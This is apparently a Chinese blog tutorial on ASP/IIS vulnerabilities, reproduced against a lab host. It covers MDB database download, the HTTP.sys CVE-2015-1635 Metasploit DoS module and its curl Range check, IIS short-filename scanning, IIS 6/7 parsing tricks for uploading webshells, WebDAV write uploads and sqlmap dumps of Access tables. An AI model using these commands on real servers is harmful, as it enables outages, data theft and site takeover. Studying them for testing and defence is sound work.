0
点赞
收藏
分享

微信扫一扫

在Node.js项目中使用node-postgres连接postgres以及报错指南

唯米天空 2023-10-16 阅读 36

文章目录


请添加图片描述

ASP-默认安装-MDB数据库泄漏下载漏洞

漏洞描述

由于大部分ASP程序与ACCESS数据库搭建,但ACCESS无需连接,都在脚本文件中定义配置好数据库路径即用,不需要额外配置安装数据库,所以大部分提前固定好的数据库路径,如默认未修改,当攻击者知道数据库的完整路径,可远程下载后解密数据实现攻击。

ASP-中间件 HTTP.SYS(CVE-2015-1635)

参考文章:https://blog.csdn.net/qq_41210745/article/details/103437683

1、漏洞描述

远程执行代码漏洞存在于 HTTP 协议堆栈 (HTTP.sys) 中,当 HTTP.sys 未正确分析经特殊设计的 HTTP 请求时会导致此漏洞。 成功利用此漏洞的攻击者可以在系统帐户的上下文中执行任意代码。

2、影响版本

Windows 7、Windows Server 2008 R2、Windows 8、Windows Server 2012、Windows 8.1 和 Windows Server 2012 R2

3、漏洞利用条件

安装了IIS6.0以上的Windows 7、Windows Server 2008 R2、Windows 8、Windows Server 2012、Windows 8.1 和 Windows Server 2012 R2版本

4、漏洞复现

msfconsole

use auxiliary/dos/http/ms15_034_ulonglongadd

set rhosts xx.xx.xx.xx

set rport xx

run

使用以下命令验证网站是否存在该漏洞:返回416,说明该系统存在漏洞

curl http://[目标地址] -H "Host: [目标地址]" -H "Range: bytes=0-18446744073709551615"

ASP-中间件 IIS短文件漏洞

1、漏洞描述

此漏洞实际是由HTTP请求中旧DOS 8.3名称约定(SFN)的代字符(~)波浪号引起的。它允许远程攻击者在Web根目录下公开文件和文件夹名称(不应该可被访问)。攻击者可以找到通常无法从外部直接访问的重要文件,并获取有关应用程序基础结构的信息。

2、漏洞成因:

为了兼容16位MS-DOS程序,Windows为文件名较长的文件(和文件夹)生成了对应的windows 8.3短文件名。在Windows下查看对应的短文件名,可以使用命令dir /x

3、应用场景:

后台路径获取,数据库文件获取,其他敏感文件获取等

4、利用工具:

https://github.com/irsdl/IIS-ShortName-Scanner

https://github.com/lijiejie/IIS_shortname_Scanner

5、漏洞复现:

使用上述工具

python iis_shortname_scan.py http://192.168.0.42:89/

结果:

请添加图片描述

ASP-中间件 IIS文件解析漏洞

该漏洞只有两个版本存在

IIS 6 解析漏洞

1、该版本默认会将*.asp;.jpg 此种格式的文件名,当成Asp解析

2、该版本默认会将*.asp/目录下的所有文件当成Asp解析。

如:

logo.asp;.jpg

xx.asp/logo.jpg

IIS 7.x 解析漏洞

在一个文件路径(/xx.jpg)后面加上/xx.php会将/xx.jpg/xx.php 解析为php文件

(有补丁)

应用场景:

配合文件上传获取Webshell

ASP-中间件 IIS写权限漏洞

IIS<=6.0 目录权限开启写入,开启WebDAV,设置为允许

可以直接上传文件。(postman)

参考利用:

https://cloud.tencent.com/developer/article/2050105

ASP-SQL注入&ACCESS注入

1、SQL注入

**数据库注入,某一个数据库注入。注入的攻击方法和攻击流程是和数据库类型相关的,并不是和脚本语言相关的。**语言使用Java,php等都无关。

2、漏洞描述

ACCESS数据库无管理帐号密码,顶级架构为表名,列名(字段),数据,所以在注入猜解中一般采用字典猜解表和列再获取数据,猜解简单但又可能出现猜解不到的情况,由于Access数据库在当前安全发展中已很少存在,故直接使用SQLMAP注入,后续再说其他。

3、漏洞复现-靶场测试-使用SQLMAP

python sqlmap.py -u "" --tables //获取表名

python sqlmap.py -u "" --cloumns -T admin //获取admin表名下的列名

python sqlmap.py -u "" --dump -C "" -T admin //获取表名下的列名数据

执行命令:

python sqlmap.py -u "http://192.168.0.42:89/Pic.asp?id=2" --tables //获取表名

结果:获取到三个表明,后续可根据表明继续进行测试。

请添加图片描述

获取网站目录方法

  1. 用字典跑
  2. 利用漏洞探针(ISS短文件
  3. 网站爬虫:获取架构中的目录和文件目录。
举报

相关推荐

0 条评论